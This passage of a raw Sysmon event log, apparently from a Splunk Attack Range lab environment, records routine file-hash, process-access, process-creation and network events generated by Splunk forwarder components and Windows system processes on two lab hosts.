Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E97752C5901DFC2F497CCB9D5774425,SHA256=919D7E3D3CD8C2F2BA171B5416B3CFEDA0E2E335CCF172B18EA4F76BF94E4D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:47.049{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93CE46EBCAC0090CB8256431338204C6,SHA256=98CF2BF544EC40C3C9BBC31A43AE073F0600FEEF6D12ED5B2859FF4E77EEF3AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:48.064{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABEBE47E020E96FE660E97607958428D,SHA256=CB4ED5303283624062CABB55F2F6BFF7023767F7B4C8F034F323975AB4023FCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808204Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:48.115{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=164166BA8A8F0EDA9D2FC8BFBBC9EEBC,SHA256=49753452E0821354D22976C817BC4971A0E0B15D4C6C7754F5B9B7C5D388BEB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:49.079{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38CC908C0C7816F49FC424ACF493C7B1,SHA256=E453C2C91A97273E46594D69DF79B41C5803E55BCB9C71DB8A2C1FE1F6A665EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808205Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:49.146{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E23468A11B91B32E150DAE30A80B8B2,SHA256=32233B850B8574D0E0A18D4E0A56B078B1B9DB0A917622C5BD410446EA9EF115,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808206Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:50.148{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1FB7D05C38D033CB8A1D277A3A1D4DE,SHA256=77B3B36E68D853308EF85E51B4238E56B77EC9B11C2426904DD1355FCAD3AA66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.869{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F586-60EB-557D-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001050191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.853{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.853{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:50.853{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.853{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:50.853{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F586-60EB-557D-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.853{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F586-60EB-557D-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.848{466BC892-F586-60EB-557D-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.616{466BC892-F586-60EB-547D-00000000CF01}102049936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.517{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075517MD5=7C0C4B52054FD15E78DB8A40B9CA49D2,SHA256=B0C36ACDF22162AD79D07D67E63140DF7514E548DA320BC04E293C986A9BC194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.502{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Program 
Files\ansible\AttackRangeSysmon.xmlMD5=086ED6BFC5C5C09C24388FE1FE5A1B61,SHA256=E8436E137196ACFC3A877F92C9ECDEFD8722CEBC96D59B28CC65F15775C1DB1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.262{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F586-60EB-547D-00000000CF01}10204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.262{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:50.262{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.262{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:50.262{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.262{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F586-60EB-547D-00000000CF01}10204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.262{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F586-60EB-547D-00000000CF01}10204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.247{466BC892-F586-60EB-547D-00000000CF01}10204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.094{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3CA7694754DD5A65BC1D2BF3C021B84,SHA256=C29F422FC93ED5E918A3083E381DC2A87EE15BB514D30FB1E1600E583238AB00,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808208Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:50.203{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57310-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808207Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:51.176{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1326FBE87DC4EBA64C1B43E95D42EC91,SHA256=BB90B6CF909E321E32A83415681C01994510626D8B4163B6FC0BFCF4DA980CA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.799{466BC892-F587-60EB-567D-00000000CF01}80289060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.530{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F587-60EB-567D-00000000CF01}8028C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.530{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:51.515{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:51.515{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
